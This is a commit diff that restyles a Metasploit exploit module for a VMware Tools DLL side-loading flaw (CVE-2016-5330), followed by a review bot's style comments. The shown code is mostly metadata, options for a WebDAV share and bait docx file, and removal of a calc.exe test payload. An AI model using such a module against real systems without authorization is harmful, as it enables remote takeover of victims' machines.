
Update vmhgfs_webdav_dll_sideload

wchen-r7 3 years ago
parent
commit
51c457dfb3
1 changed files with 19 additions and 22 deletions
  1. 19
    22
      modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb

+ 19
- 22
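--- a/modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb
+++ b/modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb
@@ -1,4 +1,3 @@
-# Based on WebDAV Application DLL Hijacker module
 require 'msf/core'
 
 class MetasploitModule < Msf::Exploit::Remote
@@ -9,8 +8,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'			=> 'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector',
-      'Description'	=> %q{
+      'Name'           => 'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector',
+      'Description'    => %q{
       A DLL side loading vulnerability was found in the VMware Host Guest Client Redirector,
       a component of VMware Tools. This issue can be exploited by luring a victim into
       opening a document from the attacker's share. An attacker can exploit this issue to
@@ -18,9 +17,9 @@ class MetasploitModule < Msf::Exploit::Remote
       result in the attacker taking complete control of the affected system. If the WebDAV
       Mini-Redirector is enabled, it is possible to exploit this issue over the internet.
       },
-      'Author'		=> 'Yorick Koster',
-      'License'		=> MSF_LICENSE,
-      'References' =>
+      'Author'         => 'Yorick Koster',
+      'License'        => MSF_LICENSE,
+      'References'     =>
         [
           ['CVE', '2016-5330'],
           ['URL', 'https://securify.nl/advisory/SFY20151201/dll_side_loading_vulnerability_in_vmware_host_guest_client_redirector.html'],
@@ -28,35 +27,33 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultOptions' =>
         {
-          'EXITFUNC' => 'thread',
-          'PAYLOAD' => 'windows/exec',
-          'CMD' => 'C:\\Windows\\System32\\calc.exe',
+          'EXITFUNC' => 'thread'
         },
-      'Payload'		=> { 'Space'	=> 2048, },
-      'Platform'		=> 'win',
-      'Targets' =>
+      'Payload'        => { 'Space' => 2048, },
+      'Platform'       => 'win',
+      'Targets'        =>
         [
-          [ 'Windows x64', {'Arch' => ARCH_X64,} ],
-          [ 'Windows x86', {'Arch' => ARCH_X86,} ],
+          [ 'Windows x64', {'Arch' => ARCH_X86_64,} ],
+          [ 'Windows x86', {'Arch' => ARCH_X86,} ]
         ],
-      'Privileged' => false,
+      'Privileged'     => false,
       'DisclosureDate' => 'Aug 5 2016',
-      'DefaultTarget' => 0))
+      'DefaultTarget'  => 0))
 
     register_options(
       [
-        OptPort.new('SRVPORT',		[ true, "The daemon port to listen on (do not change)", 80 ]),
-        OptString.new('URIPATH',	[ true, "The URI to use (do not change)", "/" ]),
-        OptString.new('BASENAME',	[ true, "The base name for the docx file", "Document1" ]),
-        OptString.new('SHARENAME',	[ true, "The name of the top-level share", "documents" ]),
+        OptPort.new('SRVPORT',     [ true, "The daemon port to listen on (do not change)", 80 ]),
+        OptString.new('URIPATH',   [ true, "The URI to use (do not change)", "/" ]),
+        OptString.new('BASENAME',  [ true, "The base name for the docx file", "Document1" ]),
+        OptString.new('SHARENAME', [ true, "The name of the top-level share", "documents" ])
       ], self.class)
 
-    deregister_options('SSL', 'SSLVersion', 'SSLCert') # no SSL
+    # no SSL
+    deregister_options('SSL', 'SSLVersion', 'SSLCert')
   end
 
 
   def on_request_uri(cli, request)
-
     case request.method
     when 'OPTIONS'
       process_options(cli, request)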
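Review bot: The inline hashes on the new side still carry a trailing comma and uneven brace spacing — `{ 'Space' => 2048, }` in 'Payload' and `{'Arch' => ARCH_X86_64,}` / `{'Arch' => ARCH_X86,}` in 'Targets' — even though this same change drops the trailing commas after the last 'DefaultOptions', 'Targets' and register_options entries. I would write them as `'Payload'        => { 'Space' => 2048 },` and `[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ],` so the metadata block follows one style. The relocated `# no SSL` comment and the "(do not change)" option descriptions also state a constraint without its reason; a one-line why-comment above `deregister_options` would help whoever maintains or audits the module. The initialize call spans several hunks with unseen lines in between, and on_request_uri continues past the last hunk.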
